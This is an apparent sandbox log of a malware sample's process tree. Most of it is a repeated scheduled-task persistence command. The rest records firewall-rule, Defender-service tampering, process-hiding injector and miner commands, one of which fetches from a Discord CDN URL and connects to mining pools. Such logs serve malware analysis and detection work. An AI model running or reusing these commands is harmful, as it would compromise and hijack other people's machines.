        C:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f  [PID 8332]
        C:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f  [PID 11424]
          - Creates scheduled task(s)
        C:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f  [PID 11420]
          - Creates scheduled task(s)
        C:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f  [PID 8824]
        C:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f  [PID 8548]
        C:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f  [PID 11316]
          - Creates scheduled task(s)
        C:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f  [PID 8296]
          - Creates scheduled task(s)
        C:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f  [PID 7404]
        C:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f  [PID 3452]
        C:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f  [PID 8096]
        C:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f  [PID 7484]
        C:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f  [PID 7344]
        C:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f  [PID 8100]
          - Creates scheduled task(s)
        C:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f  [PID 11052]
          - Creates scheduled task(s)
        C:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f  [PID 6668]
        C:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f  [PID 7136]
        C:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f  [PID 6716]
          - Creates scheduled task(s)
        C:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f  [PID 6288]
        C:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f  [PID 6976]
        C:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f  [PID 6464]
        C:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f  [PID 7048]
          - Creates scheduled task(s)
        C:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f  [PID 10348]
        C:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f  [PID 11000]
        C:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f  [PID 5664]
        C:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f  [PID 9880]
        C:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f  [PID 5156]
        C:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f  [PID 5380]
          - Creates scheduled task(s)
        C:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f  [PID 10668]
        C:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f  [PID 5192]
        C:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f  [PID 4496]
          - Creates scheduled task(s)
        C:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f  [PID 844]
        C:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f  [PID 1148]
        C:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f  [PID 10376]
        C:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f  [PID 10536]
          - Creates scheduled task(s)
        C:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f  [PID 4352]
          - Creates scheduled task(s)
        C:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f  [PID 208]
        C:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f  [PID 3628]
          - Creates scheduled task(s)
        C:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f  [PID 1156]
        C:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f  [PID 4676]
          - Creates scheduled task(s)
        C:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f  [PID 1064]
          - Creates scheduled task(s)
        C:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f  [PID 2820]
        C:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f  [PID 3788]
        C:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f  [PID 11020]
        C:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f  [PID 10820]
          - Creates scheduled task(s)
        C:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f  [PID 11560]
        C:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f  [PID 10728]
        C:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f  [PID 10264]
          - Creates scheduled task(s)
        C:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f  [PID 9536]
        C:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f  [PID 1232]
        C:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f  [PID 11884]
        C:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f  [PID 9744]
          - Creates scheduled task(s)
        C:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f  [PID 9284]
        C:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f  [PID 2024]
        C:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f  [PID 12024]
          - Creates scheduled task(s)
        C:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f  [PID 1904]
        C:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f  [PID 12088]
          - Creates scheduled task(s)
        C:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f  [PID 9588]
          - Creates scheduled task(s)
        C:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f  [PID 9932]
          - Creates scheduled task(s)
        C:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f  [PID 10016]
        C:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f  [PID 9816]
          - Creates scheduled task(s)
        C:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f  [PID 9436]
          - Creates scheduled task(s)
        C:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f  [PID 9324]
        C:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f  [PID 1096]
        C:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f  [PID 8664]
        C:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f  [PID 8820]
          - Creates scheduled task(s)
        C:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f  [PID 3028]
          - Creates scheduled task(s)
        C:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f  [PID 3608]
        C:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f  [PID 12172]
        C:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f  [PID 8676]
          - Creates scheduled task(s)
        C:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f  [PID 8248]
        C:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f  [PID 8896]
          - Creates scheduled task(s)
        C:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f  [PID 8568]
        C:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f  [PID 8308]
        C:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f  [PID 9080]
        C:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f  [PID 8992]
          - Creates scheduled task(s)
        C:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f  [PID 8824]
          - Creates scheduled task(s)
        C:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f  [PID 8364]
        C:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f  [PID 8340]
        C:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f  [PID 8296]
        C:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f  [PID 7776]
          - Creates scheduled task(s)
        C:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f  [PID 8180]
          - Creates scheduled task(s)
        C:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f  [PID 7524]
          - Creates scheduled task(s)
        C:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f  [PID 8124]
          - Creates scheduled task(s)
        C:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f  [PID 7944]
        C:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f  [PID 7656]
          - Creates scheduled task(s)
        C:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f  [PID 8116]
        C:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f  [PID 8056]
          - Creates scheduled task(s)
        C:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f  [PID 6224]
          - Creates scheduled task(s)
        C:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f
- Creates scheduled task(s)
PID:6148
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵PID:216
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵
- Creates scheduled task(s)
PID:6308
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵
- Creates scheduled task(s)
PID:6968
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵
- Creates scheduled task(s)
PID:8612
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵
- Creates scheduled task(s)
PID:6240
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵PID:10576
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵PID:6200
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵PID:6692
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵PID:5336
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵PID:5908
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵PID:11168
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵
- Creates scheduled task(s)
PID:11360
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵PID:5952
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵
- Creates scheduled task(s)
PID:5556
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵
- Creates scheduled task(s)
PID:5920
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵PID:5616
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵PID:5624
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵PID:5528
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵
- Creates scheduled task(s)
PID:5136
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵
- Creates scheduled task(s)
PID:10492
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵PID:2560
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵PID:3940
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵
- Creates scheduled task(s)
PID:4996
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵PID:11440
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵
- Creates scheduled task(s)
PID:1752
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵
- Creates scheduled task(s)
PID:3012
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵PID:11436
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵PID:3696
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵PID:2500
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵
- Creates scheduled task(s)
PID:1356
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵PID:4568
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵PID:11184
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵PID:2300
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵PID:4184
-
-
-
Level 1: C:\ProgramData\winmgr107.exe (cmd: C:\ProgramData\winmgr107.exe), PID 5056
  - Executes dropped EXE
  - NTFS ADS
  - Suspicious behavior: EnumeratesProcesses

Level 1: C:\Users\Admin\Desktop\virussign.com_0a9cfc2c2484a4c4faa964d90b7061f9.exe (cmd: "C:\Users\Admin\Desktop\virussign.com_0a9cfc2c2484a4c4faa964d90b7061f9.exe"), PID 2208
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
Level 2: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (cmd: powershell -nologo -noprofile), PID 5092
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
Level 2: C:\Users\Admin\Desktop\virussign.com_0a9cfc2c2484a4c4faa964d90b7061f9.exe (cmd: "C:\Users\Admin\Desktop\virussign.com_0a9cfc2c2484a4c4faa964d90b7061f9.exe"), PID 4988
  - Executes dropped EXE
  - Adds Run key to start application
  - Checks for VirtualBox DLLs, possible anti-VM trick
  - Drops file in Windows directory
  - Modifies data under HKEY_USERS
Level 3: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (cmd: powershell -nologo -noprofile), PID 4672
  - Command and Scripting Interpreter: PowerShell
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
Level 3: C:\Windows\system32\cmd.exe (cmd: C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"), PID 4440
Level 4: C:\Windows\system32\netsh.exe (cmd: netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes), PID 3084
  - Modifies Windows Firewall
Level 3: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (cmd: powershell -nologo -noprofile), PID 1464
  - Command and Scripting Interpreter: PowerShell
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
Level 3: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (cmd: powershell -nologo -noprofile), PID 2224
  - Command and Scripting Interpreter: PowerShell
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
Level 3: C:\Windows\rss\csrss.exe (cmd: C:\Windows\rss\csrss.exe), PID 1596
  - Executes dropped EXE
  - Adds Run key to start application
  - Manipulates WinMonFS driver.
  - Drops file in Windows directory
  - Suspicious use of AdjustPrivilegeToken
Level 4: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (cmd: powershell -nologo -noprofile), PID 2300
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of AdjustPrivilegeToken
Level 4: C:\Windows\SYSTEM32\schtasks.exe (cmd: schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F), PID 3464
Level 4: C:\Windows\SYSTEM32\schtasks.exe (cmd: schtasks /delete /tn ScheduledUpdate /f), PID 3972
Level 4: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (cmd: powershell -nologo -noprofile), PID 3548
  - Command and Scripting Interpreter: PowerShell
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
Level 4: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (cmd: powershell -nologo -noprofile), PID 4972
  - Command and Scripting Interpreter: PowerShell
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
Level 4: C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe (cmd: C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll), PID 816
  - Executes dropped EXE
Level 4: C:\Windows\SYSTEM32\schtasks.exe (cmd: schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F), PID 4912
  - Creates scheduled task(s)
Level 4: C:\Windows\windefender.exe (cmd: "C:\Windows\windefender.exe"), PID 3008
  - Executes dropped EXE
Level 5: C:\Windows\SysWOW64\cmd.exe (cmd: cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)), PID 448
Level 6: C:\Windows\SysWOW64\sc.exe (cmd: sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)), PID 4660
  - Launches sc.exe
  - Suspicious use of AdjustPrivilegeToken
Level 4: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (cmd: powershell -nologo -noprofile), PID 6604
  - Command and Scripting Interpreter: PowerShell
  - Modifies data under HKEY_USERS
Level 4: C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe (cmd: C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe -xor=al2xoqueel0She4t -m=https://cdn.discordapp.com/attachments/1225871855328559147/1225878907014615161/kVYazCOZSwqudV?ex=6622bbb3&is=661046b3&hm=c80160577fcc82f0e337c537bdd214d60583ed75bb187a016d90f94471fc09b0& -pool tls://showlock.net:40001 -pool tls://showlock.net:443 -pool tcp://showlock.net:80), PID 5504
Level 4: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (cmd: powershell -nologo -noprofile), PID 6072
  - Command and Scripting Interpreter: PowerShell
  - Modifies data under HKEY_USERS
Level 4: C:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exe (cmd: C:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exe), PID 6112
Level 4: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (cmd: powershell -nologo -noprofile), PID 5692
  - Loads dropped DLL
  - Command and Scripting Interpreter: PowerShell
  - Modifies data under HKEY_USERS
Level 4: C:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exe (cmd: C:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exe), PID 5596
  - Loads dropped DLL
